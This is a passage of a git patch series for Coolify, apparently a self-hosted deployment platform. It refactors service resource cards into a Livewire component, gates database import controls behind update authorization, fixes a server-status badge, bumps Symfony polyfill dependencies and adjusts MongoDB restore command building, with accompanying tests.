-                                    <div class="pt-2 text-xs">{{ formatContainerStatus($application->status) }}</div>
-                                </div>
-                                <div class="flex items-center px-4">
-                                    <a class="mx-4 text-xs font-bold hover:underline" {{ wireNavigate() }}
-                                        href="{{ route('project.service.index', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'service_uuid' => $service->uuid, 'stack_service_uuid' => $application->uuid]) }}">
-                                        Settings
-                                    </a>
-                                    @if (str($application->status)->contains('running'))
-                                        @can('update', $service)
-                                            <x-modal-confirmation title="Confirm Service Application Restart?"
-                                                buttonTitle="Restart"
-                                                submitAction="restartApplication({{ $application->id }})" :actions="[
-                                                    'The selected service application will be unavailable during the restart.',
-                                                    'If the service application is currently in use data could be lost.',
-                                                ]"
-                                                :confirmWithText="false" :confirmWithPassword="false"
-                                                step2ButtonText="Restart Service Container" />
-                                        @endcan
-                                    @endif
-                                </div>
-                            </div>
-                        </div>
+                        <livewire:project.service.resource-card :service="$service" :resource="$application"
+                            :parameters="$parameters" wire:key="service-application-card-{{ $application->id }}" />
                     @endforeach
                     @foreach ($databases as $database)
-                        <div @class([
-                            'border-l border-dashed border-red-500' => str($database->status)->contains(
-                                ['exited']),
-                            'border-l border-dashed border-success' => str($database->status)->contains(
-                                ['running']),
-                            'border-l border-dashed border-warning' => str($database->status)->contains(
-                                ['restarting']),
-                            'flex gap-2 box-without-bg-without-border dark:bg-coolgray-100 bg-white dark:hover:text-neutral-300 group',
-                        ])>
-                            <div class="flex flex-row w-full">
-                                <div class="flex flex-col flex-1">
-                                    <div class="pb-2">
-                                        @if ($database->human_name)
-                                            {{ Str::headline($database->human_name) }}
-                                        @else
-                                            {{ Str::headline($database->name) }}
-                                        @endif
-                                        <span class="text-xs">({{ $database->image }})</span>
-                                    </div>
-                                    @if ($database->configuration_required)
-                                        <span class="text-xs text-error">(configuration required)</span>
-                                    @endif
-                                    @if ($database->description)
-                                        <span class="text-xs">{{ Str::limit($database->description, 60) }}</span>
-                                    @endif
-                                    <div class="text-xs">{{ formatContainerStatus($database->status) }}</div>
-                                </div>
-                                <div class="flex items-center px-4">
-                                    @if ($database->isBackupSolutionAvailable() || $database->is_migrated)
-                                        <a class="mx-4 text-xs font-bold hover:underline" {{ wireNavigate() }}
-                                            href="{{ route('project.service.database.backups', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'service_uuid' => $service->uuid, 'stack_service_uuid' => $database->uuid]) }}">
-                                            Backups
-                                        </a>
-                                    @endif
-                                    <a class="mx-4 text-xs font-bold hover:underline" {{ wireNavigate() }}
-                                        href="{{ route('project.service.index', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'service_uuid' => $service->uuid, 'stack_service_uuid' => $database->uuid]) }}">
-                                        Settings
-                                    </a>
-                                    @if (str($database->status)->contains('running'))
-                                        @can('update', $service)
-                                            <x-modal-confirmation title="Confirm Service Database Restart?"
-                                                buttonTitle="Restart" submitAction="restartDatabase({{ $database->id }})"
-                                                :actions="[
-                                                    'This service database will be unavailable during the restart.',
-                                                    'If the service database is currently in use data could be lost.',
-                                                ]" :confirmWithText="false" :confirmWithPassword="false"
-                                                step2ButtonText="Restart Database" />
-                                        @endcan
-                                    @endif
-                                </div>
-                            </div>
-                        </div>
+                        <livewire:project.service.resource-card :service="$service" :resource="$database"
+                            :parameters="$parameters" wire:key="service-database-card-{{ $database->id }}" />
                     @endforeach
                 </div>
             @elseif ($currentRoute === 'project.service.environment-variables')
diff --git a/resources/views/livewire/project/service/resource-card.blade.php b/resources/views/livewire/project/service/resource-card.blade.php
new file mode 100644
index 000000000..47fb00914
--- /dev/null
+++ b/resources/views/livewire/project/service/resource-card.blade.php
@@ -0,0 +1,77 @@
+<div @class([
+    'border-l border-dashed border-red-500' => str($resource->status)->contains(['exited']),
+    'border-l border-dashed border-success' => str($resource->status)->contains(['running']),
+    'border-l border-dashed border-warning' => str($resource->status)->contains(['starting', 'restarting']),
+    'flex gap-2 box-without-bg-without-border dark:bg-coolgray-100 bg-white dark:hover:text-neutral-300 group',
+])>
+    <div class="flex flex-row w-full">
+        <div class="flex flex-col flex-1">
+            <div class="pb-2">
+                @if ($resource->human_name)
+                    {{ Str::headline($resource->human_name) }}
+                @else
+                    {{ Str::headline($resource->name) }}
+                @endif
+                <span class="text-xs">({{ $resource->image }})</span>
+            </div>
+            @if ($resource->configuration_required)
+                <span class="text-xs text-error">(configuration required)</span>
+            @endif
+            @if ($resource->description)
+                <span class="text-xs">{{ Str::limit($resource->description, 60) }}</span>
+            @endif
+            @if ($isApplication && $resource->fqdn)
+                <span class="flex gap-1 text-xs">{{ Str::limit($resource->fqdn, 60) }}
+                    @can('update', $service)
+                        <x-modal-input title="Edit Domains" :closeOutside="false">
+                            <x-slot:content>
+                                <span class="cursor-pointer">
+                                    <svg xmlns="http://www.w3.org/2000/svg"
+                                        class="w-4 h-4 dark:text-warning text-coollabs"
+                                        viewBox="0 0 24 24">
+                                        <g fill="none" stroke="currentColor" stroke-linecap="round"
+                                            stroke-linejoin="round" stroke-width="2">
+                                            <path d="m12 15l8.385-8.415a2.1 2.1 0 0 0-2.97-2.97L9 12v3h3zm4-10l3 3" />
+                                            <path d="M9 7.07A7 7 0 0 0 10 21a7 7 0 0 0 6.929-6" />
+                                        </g>
+                                    </svg>
+                                </span>
+                            </x-slot:content>
+                            <livewire:project.service.edit-domain applicationId="{{ $resource->id }}"
+                                wire:key="edit-domain-{{ $resource->id }}" />
+                        </x-modal-input>
+                    @endcan
+                </span>
+            @endif
+            <div @class(['pt-2' => $isApplication, 'text-xs'])>{{ formatContainerStatus($resource->status) }}</div>
+        </div>
+        <div class="flex items-center px-4">
+            @if ($isDatabase && ($resource->isBackupSolutionAvailable() || $resource->is_migrated))
+                <a class="mx-4 text-xs font-bold hover:underline" {{ wireNavigate() }}
+                    href="{{ route('project.service.database.backups', [...$parameters, 'stack_service_uuid' => $resource->uuid]) }}">
+                    Backups
+                </a>
+            @endif
+            <a class="mx-4 text-xs font-bold hover:underline" {{ wireNavigate() }}
+                href="{{ route('project.service.index', [...$parameters, 'stack_service_uuid' => $resource->uuid]) }}">
+                Settings
+            </a>
+            @if (str($resource->status)->contains('running'))
+                @can('update', $service)
+                    <x-modal-confirmation :title="$isApplication ? 'Confirm Service Application Restart?' : 'Confirm Service Database Restart?'"
+                        buttonTitle="Restart" submitAction="restart" :actions="$isApplication
+                            ? [
+                                'The selected service application will be unavailable during the restart.',
+                                'If the service application is currently in use data could be lost.',
+                            ]
+                            : [
+                                'This service database will be unavailable during the restart.',
+                                'If the service database is currently in use data could be lost.',
+                            ]"
+                        :confirmWithText="false" :confirmWithPassword="false"
+                        :step2ButtonText="$isApplication ? 'Restart Service Container' : 'Restart Database'" />
+                @endcan
+            @endif
+        </div>
+    </div>
+</div>
diff --git a/tests/Feature/DatabaseSslStatusRefreshTest.php b/tests/Feature/DatabaseSslStatusRefreshTest.php
index 7efb03789..6e8216eed 100644
--- a/tests/Feature/DatabaseSslStatusRefreshTest.php
+++ b/tests/Feature/DatabaseSslStatusRefreshTest.php
@@ -1,9 +1,13 @@
 <?php
 
+use App\Livewire\Project\Application\Configuration as ApplicationConfiguration;
+use App\Livewire\Project\Application\ServerStatusBadge;
 use App\Livewire\Project\Database\Clickhouse\General as ClickhouseGeneral;
 use App\Livewire\Project\Database\Clickhouse\StatusInfo as ClickhouseStatusInfo;
 use App\Livewire\Project\Database\Dragonfly\General as DragonflyGeneral;
 use App\Livewire\Project\Database\Dragonfly\StatusInfo as DragonflyStatusInfo;
+use App\Livewire\Project\Database\Import as DatabaseImport;
+use App\Livewire\Project\Database\ImportForm as DatabaseImportForm;
 use App\Livewire\Project\Database\Keydb\General as KeydbGeneral;
 use App\Livewire\Project\Database\Keydb\StatusInfo as KeydbStatusInfo;
 use App\Livewire\Project\Database\Mariadb\General as MariadbGeneral;
@@ -16,11 +20,15 @@
 use App\Livewire\Project\Database\Postgresql\StatusInfo as PostgresqlStatusInfo;
 use App\Livewire\Project\Database\Redis\General as RedisGeneral;
 use App\Livewire\Project\Database\Redis\StatusInfo as RedisStatusInfo;
+use App\Livewire\Project\Service\Configuration as ServiceConfiguration;
+use App\Livewire\Project\Service\ResourceCard as ServiceResourceCard;
 use App\Livewire\Server\Sentinel;
 use App\Livewire\Server\Show;
 use App\Models\Environment;
 use App\Models\Project;
 use App\Models\Server;
+use App\Models\Service;
+use App\Models\ServiceApplication;
 use App\Models\StandaloneDocker;
 use App\Models\StandaloneMysql;
 use App\Models\StandaloneRedis;
@@ -52,6 +60,9 @@
     KeydbGeneral::class,
     DragonflyGeneral::class,
     ClickhouseGeneral::class,
+    DatabaseImportForm::class,
+    ServiceConfiguration::class,
+    ApplicationConfiguration::class,
 ]);
 
 dataset('database-status-info-components', [
@@ -65,6 +76,20 @@
     ClickhouseStatusInfo::class,
 ]);
 
+dataset('display-only-status-components', [
+    RedisStatusInfo::class,
+    PostgresqlStatusInfo::class,
+    MysqlStatusInfo::class,
+    MariadbStatusInfo::class,
+    MongodbStatusInfo::class,
+    KeydbStatusInfo::class,
+    DragonflyStatusInfo::class,
+    ClickhouseStatusInfo::class,
+    DatabaseImport::class,
+    ServiceResourceCard::class,
+    ServerStatusBadge::class,
+]);
+
 it('does not subscribe the form to status broadcasts when display lives in a sibling', function (string $componentClass) {
     // Regression guard for coolify#6062 / #6354 / #9695:
     // Status broadcasts on the form would trigger a Livewire roundtrip that absorbs
@@ -101,6 +126,80 @@ function resolveLivewireListeners(object $component): array
         ->toHaveKey("echo-private:team.{$this->team->id},ServiceChecked");
 })->with('database-status-info-components');
 
+it('keeps realtime status listeners on display-only components instead of form owners', function (string $componentClass) {
+    $listeners = resolveLivewireListeners(app($componentClass));
+
+    expect($listeners)->not->toBeEmpty();
+})->with('display-only-status-components');
+
+it('refreshes a service resource card without refreshing the service configuration form owner', function () {
+    $server = Server::factory()->create(['team_id' => $this->team->id]);
+    $destination = StandaloneDocker::where('server_id', $server->id)->first();
+    $project = Project::factory()->create(['team_id' => $this->team->id]);
+    $environment = Environment::factory()->create(['project_id' => $project->id]);
+    $service = Service::create([
+        'name' => 'status-card-service',
+        'environment_id' => $environment->id,
+        'server_id' => $server->id,
+        'destination_id' => $destination->id,
+        'destination_type' => $destination->getMorphClass(),
+        'docker_compose_raw' => 'services: {}',
+    ]);
+    $serviceApplication = ServiceApplication::create([
+        'service_id' => $service->id,
+        'name' => 'web',
+        'image' => 'nginx:latest',
+        'status' => 'exited:unhealthy',
+    ]);
+    $parameters = [
+        'project_uuid' => $project->uuid,
+        'environment_uuid' => $environment->uuid,
+        'service_uuid' => $service->uuid,
+    ];
+
+    $component = Livewire::test(ServiceResourceCard::class, [
+        'service' => $service,
+        'resource' => $serviceApplication,
+        'parameters' => $parameters,
+    ]);
+
+    $serviceApplication->fill(['status' => 'running:healthy'])->save();
+
+    $component->call('refreshResource');
+
+    expect($component->instance()->resource->status)->toBe('running:healthy');
+});
+
+it('refreshes database import status from stored resource identity after the route context is gone', function () {
+    $server = Server::factory()->create(['team_id' => $this->team->id]);
+    $destination = StandaloneDocker::where('server_id', $server->id)->first();
+    $project = Project::factory()->create(['team_id' => $this->team->id]);
+    $environment = Environment::factory()->create(['project_id' => $project->id]);
+    $database = StandaloneMysql::create([
+        'name' => 'import-status-mysql',
+        'image' => 'mysql:8',
+        'mysql_root_password' => 'password',
+        'mysql_user' => 'coolify',
+        'mysql_password' => 'password',
+        'mysql_database' => 'coolify',
+        'status' => 'exited:unhealthy',
+        'is_log_drain_enabled' => false,
+        'environment_id' => $environment->id,
+        'destination_id' => $destination->id,
+        'destination_type' => $destination->getMorphClass(),
+    ]);
+
+    $component = app(DatabaseImport::class);
+    $component->resourceId = $database->id;
+    $component->resourceType = StandaloneMysql::class;
+
+    $database->fill(['status' => 'running:healthy'])->save();
+
+    $component->refreshStatus();
+
+    expect($component->resourceStatus)->toBe('running:healthy');
+});
+
 it('reloads the mysql status-info model when refresh is called so ssl controls follow the latest status', function () {
     $server = Server::factory()->create(['team_id' => $this->team->id]);
     $destination = StandaloneDocker::where('server_id', $server->id)->first();

From 902a60239d867be63e3c53c55a5e2ba0204d984e Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 28 May 2026 20:46:38 +0200
Subject: [PATCH 33/90] fix(database): use named backup upload route

---
 resources/views/livewire/project/database/import-form.blade.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/resources/views/livewire/project/database/import-form.blade.php b/resources/views/livewire/project/database/import-form.blade.php
index 15306f9df..ae74e0cbd 100644
--- a/resources/views/livewire/project/database/import-form.blade.php
+++ b/resources/views/livewire/project/database/import-form.blade.php
@@ -134,7 +134,7 @@ class="flex-1 p-6 border-2 rounded-sm cursor-pointer transition-all"
                     <div class="pt-2 text-center text-xl font-bold">
                         Or
                     </div>
-                    <form action="/upload/backup/{{ $resourceUuid }}" class="dropzone" id="my-dropzone" wire:ignore>
+                    <form action="{{ route('upload.backup', ['databaseUuid' => $resourceUuid]) }}" class="dropzone" id="my-dropzone" wire:ignore>
                         @csrf
                     </form>
                     <div x-show="isUploading">

From eb7da5c082342cc2b81e0bbbc705b7811becebc3 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 28 May 2026 20:48:18 +0200
Subject: [PATCH 34/90] fix(database): gate import form controls by update
 access

Require database import form controls to declare update authorization against the resource and add coverage to prevent unguarded controls.
---
 .../project/database/import-form.blade.php    | 28 +++++++++----------
 .../DatabaseImportFormAuthorizationTest.php   | 20 +++++++++++++
 2 files changed, 34 insertions(+), 14 deletions(-)
 create mode 100644 tests/Feature/DatabaseImportFormAuthorizationTest.php

diff --git a/resources/views/livewire/project/database/import-form.blade.php b/resources/views/livewire/project/database/import-form.blade.php
index ae74e0cbd..1e384ac8d 100644
--- a/resources/views/livewire/project/database/import-form.blade.php
+++ b/resources/views/livewire/project/database/import-form.blade.php
@@ -58,9 +58,9 @@
             @if ($resourceDbType === 'standalone-postgresql')
                 @if ($dumpAll)
                     <x-forms.textarea rows="6" readonly label="Custom Import Command"
-                        wire:model='restoreCommandText'></x-forms.textarea>
+                        wire:model='restoreCommandText' canGate="update" :canResource="$this->resource"></x-forms.textarea>
                 @else
-                    <x-forms.input label="Custom Import Command" wire:model='postgresqlRestoreCommand'></x-forms.input>
+                    <x-forms.input label="Custom Import Command" wire:model='postgresqlRestoreCommand' canGate="update" :canResource="$this->resource"></x-forms.input>
                     <div class="flex flex-col gap-1 pt-1">
                         <span class="text-xs">You can add "--clean" to drop objects before creating them, avoiding
                             conflicts.</span>
@@ -68,27 +68,27 @@
                     </div>
                 @endif
                 <div class="w-64 pt-2">
-                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll'></x-forms.checkbox>
+                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll' canGate="update" :canResource="$this->resource"></x-forms.checkbox>
                 </div>
             @elseif ($resourceDbType === 'standalone-mysql')
                 @if ($dumpAll)
                     <x-forms.textarea rows="14" readonly label="Custom Import Command"
-                        wire:model='restoreCommandText'></x-forms.textarea>
+                        wire:model='restoreCommandText' canGate="update" :canResource="$this->resource"></x-forms.textarea>
                 @else
-                    <x-forms.input label="Custom Import Command" wire:model='mysqlRestoreCommand'></x-forms.input>
+                    <x-forms.input label="Custom Import Command" wire:model='mysqlRestoreCommand' canGate="update" :canResource="$this->resource"></x-forms.input>
                 @endif
                 <div class="w-64 pt-2">
-                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll'></x-forms.checkbox>
+                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll' canGate="update" :canResource="$this->resource"></x-forms.checkbox>
                 </div>
             @elseif ($resourceDbType === 'standalone-mariadb')
                 @if ($dumpAll)
                     <x-forms.textarea rows="14" readonly label="Custom Import Command"
-                        wire:model='restoreCommandText'></x-forms.textarea>
+                        wire:model='restoreCommandText' canGate="update" :canResource="$this->resource"></x-forms.textarea>
                 @else
-                    <x-forms.input label="Custom Import Command" wire:model='mariadbRestoreCommand'></x-forms.input>
+                    <x-forms.input label="Custom Import Command" wire:model='mariadbRestoreCommand' canGate="update" :canResource="$this->resource"></x-forms.input>
                 @endif
                 <div class="w-64 pt-2">
-                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll'></x-forms.checkbox>
+                    <x-forms.checkbox label="Backup includes all databases" wire:model.live='dumpAll' canGate="update" :canResource="$this->resource"></x-forms.checkbox>
                 </div>
             @endif
 
@@ -128,8 +128,8 @@ class="flex-1 p-6 border-2 rounded-sm cursor-pointer transition-all"
                     <h3>Backup File</h3>
                     <form class="flex gap-2 items-end pt-2">
                         <x-forms.input label="Location of the backup file on the server" placeholder="e.g. /home/user/backup.sql.gz"
-                            wire:model='customLocation' x-model="$wire.customLocation"></x-forms.input>
-                        <x-forms.button class="w-full" wire:click='checkFile' x-bind:disabled="!$wire.customLocation">Check File</x-forms.button>
+                            wire:model='customLocation' x-model="$wire.customLocation" canGate="update" :canResource="$this->resource"></x-forms.input>
+                        <x-forms.button class="w-full" wire:click='checkFile' x-bind:disabled="!$wire.customLocation" canGate="update" :canResource="$this->resource">Check File</x-forms.button>
                     </form>
                     <div class="pt-2 text-center text-xl font-bold">
                         Or
@@ -168,7 +168,7 @@ class="flex-1 p-6 border-2 rounded-sm cursor-pointer transition-all"
                     <div x-show="restoreType === 's3'" class="pt-6">
                         <h3>Restore from S3</h3>
                         <div class="flex flex-col gap-2 pt-2">
-                            <x-forms.select label="S3 Storage" wire:model.live="s3StorageId">
+                            <x-forms.select label="S3 Storage" wire:model.live="s3StorageId" canGate="update" :canResource="$this->resource">
                                 <option value="">Select S3 Storage</option>
                                 @foreach ($availableS3Storages as $storage)
                                     <option value="{{ $storage['id'] }}">{{ $storage['name'] }}
@@ -182,10 +182,10 @@ class="flex-1 p-6 border-2 rounded-sm cursor-pointer transition-all"
                             <x-forms.input label="S3 File Path (within bucket)"
                                 helper="Path to the backup file in your S3 bucket, e.g., /backups/database-2025-01-15.gz"
                                 placeholder="/backups/database-backup.gz" wire:model.blur='s3Path'
-                                wire:keydown.enter='checkS3File'></x-forms.input>
+                                wire:keydown.enter='checkS3File' canGate="update" :canResource="$this->resource"></x-forms.input>
 
                             <div class="flex gap-2">
-                                <x-forms.button class="w-full" wire:click='checkS3File' x-bind:disabled="!s3StorageId || !s3Path">
+                                <x-forms.button class="w-full" wire:click='checkS3File' x-bind:disabled="!s3StorageId || !s3Path" canGate="update" :canResource="$this->resource">
                                     Check File
                                 </x-forms.button>
                             </div>
diff --git a/tests/Feature/DatabaseImportFormAuthorizationTest.php b/tests/Feature/DatabaseImportFormAuthorizationTest.php
new file mode 100644
index 000000000..935700e3a
--- /dev/null
+++ b/tests/Feature/DatabaseImportFormAuthorizationTest.php
@@ -0,0 +1,20 @@
+<?php
+
+it('declares explicit authorization on database import form controls', function () {
+    $view = file_get_contents(resource_path('views/livewire/project/database/import-form.blade.php'));
+
+    preg_match_all(
+        '/<x-forms\.(button|input|select|checkbox|textarea)\b[^>]*>/s',
+        $view,
+        $matches,
+        PREG_OFFSET_CAPTURE
+    );
+
+    $missingAuthorization = collect($matches[0])
+        ->filter(fn (array $match): bool => ! str_contains($match[0], 'canGate=') || ! str_contains($match[0], 'canResource='))
+        ->map(fn (array $match): string => 'Line '.(substr_count(substr($view, 0, $match[1]), PHP_EOL) + 1).': '.trim(preg_replace('/\s+/', ' ', $match[0])))
+        ->values()
+        ->all();
+
+    expect($missingAuthorization)->toBeEmpty();
+});

From 37a99e5f94cfd4e1e8cf2eee2617bfb8aa4d0cb9 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 28 May 2026 20:50:14 +0200
Subject: [PATCH 35/90] fix(application): only show server warning for false
 status

Treat unknown server status separately from false so the unreachable badge is not shown until a server is confirmed unreachable. Add feature coverage for the badge rendering.
---
 .../application/server-status-badge.blade.php |  2 +-
 .../ApplicationServerStatusBadgeTest.php      | 42 +++++++++++++++++++
 2 files changed, 43 insertions(+), 1 deletion(-)
 create mode 100644 tests/Feature/ApplicationServerStatusBadgeTest.php

diff --git a/resources/views/livewire/project/application/server-status-badge.blade.php b/resources/views/livewire/project/application/server-status-badge.blade.php
index 3413b3671..80c786a3e 100644
--- a/resources/views/livewire/project/application/server-status-badge.blade.php
+++ b/resources/views/livewire/project/application/server-status-badge.blade.php
@@ -1,5 +1,5 @@
 <span>
-    @if ($application->server_status == false)
+    @if ($application->server_status === false)
         <span title="One or more servers are unreachable or misconfigured.">
             <svg class="w-4 h-4 text-error" viewBox="0 0 256 256" xmlns="http://www.w3.org/2000/svg">
                 <path fill="currentColor"
diff --git a/tests/Feature/ApplicationServerStatusBadgeTest.php b/tests/Feature/ApplicationServerStatusBadgeTest.php
new file mode 100644
index 000000000..2596752eb
--- /dev/null
+++ b/tests/Feature/ApplicationServerStatusBadgeTest.php
@@ -0,0 +1,42 @@
+<?php
+
+function renderApplicationServerStatusBadge(?bool $serverStatus, string $status = 'running', bool $hasAdditionalServers = false): string
+{
+    $application = new class($serverStatus, $status, $hasAdditionalServers)
+    {
+        public function __construct(
+            public ?bool $server_status,
+            public string $status,
+            private bool $hasAdditionalServers,
+        ) {}
+
+        public function additional_servers(): object
+        {
+            return new class($this->hasAdditionalServers)
+            {
+                public function __construct(private bool $exists) {}
+
+                public function exists(): bool
+                {
+                    return $this->exists;
+                }
+            };
+        }
+    };
+
+    return view('livewire.project.application.server-status-badge', [
+        'application' => $application,
+    ])->render();
+}
+
+it('does not show the unreachable server badge when server status is unknown', function () {
+    $html = renderApplicationServerStatusBadge(null);
+
+    expect($html)->not->toContain('One or more servers are unreachable or misconfigured.');
+});
+
+it('shows the unreachable server badge only when server status is false', function () {
+    $html = renderApplicationServerStatusBadge(false);
+
+    expect($html)->toContain('One or more servers are unreachable or misconfigured.');
+});

From d7d9004aaef5c58c633deabfe2d471013167798b Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Fri, 29 May 2026 01:18:55 +0000
Subject: [PATCH 36/90] chore(deps): bump symfony/polyfill-intl-idn from 1.37.0
 to 1.38.1

Bumps [symfony/polyfill-intl-idn](https://github.com/symfony/polyfill-intl-idn) from 1.37.0 to 1.38.1.
- [Release notes](https://github.com/symfony/polyfill-intl-idn/releases)
- [Commits](https://github.com/symfony/polyfill-intl-idn/compare/v1.37.0...v1.38.1)

---
updated-dependencies:
- dependency-name: symfony/polyfill-intl-idn
  dependency-version: 1.38.1
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 composer.lock | 38 +++++++++++++++++++-------------------
 1 file changed, 19 insertions(+), 19 deletions(-)

diff --git a/composer.lock b/composer.lock
index 24eb0bf73..7d958a9cc 100644
--- a/composer.lock
+++ b/composer.lock
@@ -9667,16 +9667,16 @@
         },
         {
             "name": "symfony/polyfill-intl-idn",
-            "version": "v1.37.0",
+            "version": "v1.38.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/symfony/polyfill-intl-idn.git",
-                "reference": "9614ac4d8061dc257ecc64cba1b140873dce8ad3"
+                "reference": "dc21118016c039a66235cf93d96b435ffb282412"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/symfony/polyfill-intl-idn/zipball/9614ac4d8061dc257ecc64cba1b140873dce8ad3",
-                "reference": "9614ac4d8061dc257ecc64cba1b140873dce8ad3",
+                "url": "https://api.github.com/repos/symfony/polyfill-intl-idn/zipball/dc21118016c039a66235cf93d96b435ffb282412",
+                "reference": "dc21118016c039a66235cf93d96b435ffb282412",
                 "shasum": ""
             },
             "require": {
@@ -9730,7 +9730,7 @@
                 "shim"
             ],
             "support": {
-                "source": "https://github.com/symfony/polyfill-intl-idn/tree/v1.37.0"
+                "source": "https://github.com/symfony/polyfill-intl-idn/tree/v1.38.1"
             },
             "funding": [
                 {
@@ -9750,20 +9750,20 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2024-09-10T14:38:51+00:00"
+            "time": "2026-05-25T15:22:23+00:00"
         },
         {
             "name": "symfony/polyfill-intl-normalizer",
-            "version": "v1.37.0",
+            "version": "v1.38.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/symfony/polyfill-intl-normalizer.git",
-                "reference": "3833d7255cc303546435cb650316bff708a1c75c"
+                "reference": "2d446c214bdbe5b71bde5011b060a05fece3ae6b"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/symfony/polyfill-intl-normalizer/zipball/3833d7255cc303546435cb650316bff708a1c75c",
-                "reference": "3833d7255cc303546435cb650316bff708a1c75c",
+                "url": "https://api.github.com/repos/symfony/polyfill-intl-normalizer/zipball/2d446c214bdbe5b71bde5011b060a05fece3ae6b",
+                "reference": "2d446c214bdbe5b71bde5011b060a05fece3ae6b",
                 "shasum": ""
             },
             "require": {
@@ -9815,7 +9815,7 @@
                 "shim"
             ],
             "support": {
-                "source": "https://github.com/symfony/polyfill-intl-normalizer/tree/v1.37.0"
+                "source": "https://github.com/symfony/polyfill-intl-normalizer/tree/v1.38.0"
             },
             "funding": [
                 {
@@ -9835,20 +9835,20 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2024-09-09T11:45:10+00:00"
+            "time": "2026-05-25T13:48:31+00:00"
         },
         {
             "name": "symfony/polyfill-mbstring",
-            "version": "v1.37.0",
+            "version": "v1.38.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/symfony/polyfill-mbstring.git",
-                "reference": "6a21eb99c6973357967f6ce3708cd55a6bec6315"
+                "reference": "14c5439eec4ccff081ac14eca2dc57feb2a66d92"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/symfony/polyfill-mbstring/zipball/6a21eb99c6973357967f6ce3708cd55a6bec6315",
-                "reference": "6a21eb99c6973357967f6ce3708cd55a6bec6315",
+                "url": "https://api.github.com/repos/symfony/polyfill-mbstring/zipball/14c5439eec4ccff081ac14eca2dc57feb2a66d92",
+                "reference": "14c5439eec4ccff081ac14eca2dc57feb2a66d92",
                 "shasum": ""
             },
             "require": {
@@ -9900,7 +9900,7 @@
                 "shim"
             ],
             "support": {
-                "source": "https://github.com/symfony/polyfill-mbstring/tree/v1.37.0"
+                "source": "https://github.com/symfony/polyfill-mbstring/tree/v1.38.1"
             },
             "funding": [
                 {
@@ -9920,7 +9920,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-04-10T17:25:58+00:00"
+            "time": "2026-05-26T12:51:13+00:00"
         },
         {
             "name": "symfony/polyfill-php80",
@@ -18072,5 +18072,5 @@
         "php": "^8.4"
     },
     "platform-dev": {},
-    "plugin-api-version": "2.6.0"
+    "plugin-api-version": "2.9.0"
 }

From bbbd46ca262f87652c620e972133a7f1b8103c28 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 29 May 2026 08:27:45 +0200
Subject: [PATCH 37/90] fix(database): always include MongoDB archive path in
 restores

---
 app/Livewire/Project/Database/ImportForm.php  |  5 +-
 .../Unit/Livewire/Database/S3RestoreTest.php  | 57 ++++++++-----------
 2 files changed, 26 insertions(+), 36 deletions(-)

diff --git a/app/Livewire/Project/Database/ImportForm.php b/app/Livewire/Project/Database/ImportForm.php
index 1d394af87..3b72383a5 100644
--- a/app/Livewire/Project/Database/ImportForm.php
+++ b/app/Livewire/Project/Database/ImportForm.php
@@ -807,10 +807,7 @@ public function buildRestoreCommand(string $tmpPath): string
                 break;
             case StandaloneMongodb::class:
             case 'mongodb':
-                $restoreCommand = $this->mongodbRestoreCommand;
-                if ($this->dumpAll === false) {
-                    $restoreCommand .= "{$tmpPath}";
-                }
+                $restoreCommand = $this->mongodbRestoreCommand."{$tmpPath}";
                 break;
             default:
                 $restoreCommand = '';
diff --git a/tests/Unit/Livewire/Database/S3RestoreTest.php b/tests/Unit/Livewire/Database/S3RestoreTest.php
index 18837b466..4dfc7f51c 100644
--- a/tests/Unit/Livewire/Database/S3RestoreTest.php
+++ b/tests/Unit/Livewire/Database/S3RestoreTest.php
@@ -1,16 +1,26 @@
 <?php
 
-use App\Livewire\Project\Database\Import;
+use App\Livewire\Project\Database\ImportForm;
+
+function importFormWithResource(string $modelClass): ImportForm
+{
+    $component = new class extends ImportForm
+    {
+        public $resource;
+    };
+
+    $database = Mockery::mock($modelClass);
+    $database->shouldReceive('getMorphClass')->andReturn($modelClass);
+    $component->resource = $database;
+
+    return $component;
+}
 
 test('buildRestoreCommand handles PostgreSQL without dumpAll', function () {
-    $component = new Import;
+    $component = importFormWithResource('App\Models\StandalonePostgresql');
     $component->dumpAll = false;
     $component->postgresqlRestoreCommand = 'pg_restore -U $POSTGRES_USER -d $POSTGRES_DB';
 
-    $database = Mockery::mock('App\Models\StandalonePostgresql');
-    $database->shouldReceive('getMorphClass')->andReturn('App\Models\StandalonePostgresql');
-    $component->resource = $database;
-
     $result = $component->buildRestoreCommand('/tmp/test.dump');
 
     expect($result)->toContain('pg_restore');
@@ -18,30 +28,21 @@
 });
 
 test('buildRestoreCommand handles PostgreSQL with dumpAll', function () {
-    $component = new Import;
+    $component = importFormWithResource('App\Models\StandalonePostgresql');
     $component->dumpAll = true;
-    // This is the full dump-all command prefix that would be set in the updatedDumpAll method
